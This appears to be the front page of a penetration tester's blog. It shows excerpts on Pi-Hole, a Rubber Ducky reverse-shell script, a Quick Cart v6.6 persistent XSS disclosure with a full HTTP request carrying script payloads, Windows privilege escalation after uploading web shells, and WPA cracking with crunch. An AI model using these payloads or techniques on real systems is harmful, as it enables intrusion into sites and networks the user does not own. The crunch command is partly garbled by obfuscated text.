Pi-Holed

Standard

Very recently I felt one of my virtual machines is infected by malware and I was thinking about restoring it to a clean snapshot but then I thought let’s find other ways to identify and block these types of attacks. There were few more issue I wanted to resolve on my network which includes blocking of advertisements on the pages I visit, blocking all malicious IOC over the network, etc, one of the game BattleField 4 which I play on PS4 wasn’t able to connect to online gaming due to blocking of DNS at ISP, etc.

I started doing my research where I found discovered “Pi-Hole”, Basically Pi-Hole is a network-wide Advertisement blocking solution (DNS Server) that can be installed on a virtual machine or on your own hardware e.g RaspberryPI 3 in my case.

Continue reading

Rubber Ducky

Standard

During my recent internal BlackBox testing, I got a chance to use the rubber ducky. This device looks like a USB thumb drive, can be concealed inside a standard USB case and it acts as a keyboard. The script written on the SD card is called ducky script which is very easy to understand.

Since there are a lot of write-ups on the internet about the ducky ill just be posting on of the script I used in my recent pen-testing. I hope you may find it useful.

The script is written keeping in mind that not all windows OS are the same, and hardware specifications are different as well. While using the default scripts at times the system was not able to type complete code, hence you will see many spaces and delays.


Reverse Shell

Continue reading

QUICK CART V6.6 Persistent XSS

Standard
# Exploit Title: QUICK CART V6.6 Persistent XSS
# Date: 19/01/2016
# Exploit Author: Mr T
# Exploit Authors Website: http://www.securitypentester.ninja
# Vulnerable Version: V6.6
# Tested on: Linux
#  Vendor doesn’t consider this a vulnerability.

Persistent XSS

Issue No # 1
Persistent XSS on parameter “title”
Request Sent:

POST /admin.php?p=tools-config HTTP/1.1
Host: 192.168.2.100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.2.100/admin.php?p=tools-config&sOption=login-pass
Cookie: PHPSESSID=ijfqciqrrhme9g3rghoj7oatr3; sLogin=admin; bLicense66=true
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 824
sOption=save+%C2%BB&title=50a77%3c%2ftitle%3e%3cscript%3econfirm(1)%3c%2fscript%3e6f169&default_lang=en&admin_lang=en&skin=default&sorting_products=true&currency_symbol=EUR&hidden_shows=false&display_expanded_menu=true&language_in_url=false&start_page=6&basket_page=15&order_page=16&order_print=18&rules_page=4&page_search=17&admin_list=25&products_list=6&change_files_names=false&delete_unused_files=true&wysiwyg=true&send_customer_order_details=false&display_subcategory_products=true&remember_basket=false&description=Freeware%2C+fast%2C+simple%2C+and+multilingual+shopping+cart+system.+It+is+based+on+Flat+Files%2C+uses+templates+system%2C+valid+XHTML+1.1+and+WAI&logo=%3C%2Fh1%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Ch1%3E&slogan=Fast+and+simple+shopping+cart&foot_info=All+rights+reserved&login=admin&pass=admin&orders_email=

Continue reading

Windows Privilege Escalation

Standard

Windows privilege escalation exploits are used for elevation of privilege locally and runs arbitrary code in kernel mode. In other words, when you have a web backdoor shell on your target server which doesn’t have administrative privileges you would require a exploit to get admin account.

During my many penetration testing experience, at times i am able to upload web backdoor shell, however my goal is to get Administrator level privileges . When ever i upload a web shell, the second file i upload is a Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems. This can be downloaded from https://github.com/pentestmonkey/windows-privesc-check .

audit

Continue reading

PassGen – Generate Wordlist & Crack WPA/WPA2

Standard

I recently came across a python script which creates random characters like CRUNCH and cracking a WPA / WPA2 cap file.

This script can be found at  https://github.com/blmvxer/passgen/  provide a good GPU and you wont need a wordlist anymore.Screenshot from 2015-07-29 00:40:08

Screenshot from 2015-07-29 00:40:37

 

Furthermore a custom list can be generated , Please see the example below

./crunch 8 8 -f /usr/share/crunch/charset.lst numeric -t ‘[email protected]’@@@@ -l [email protected]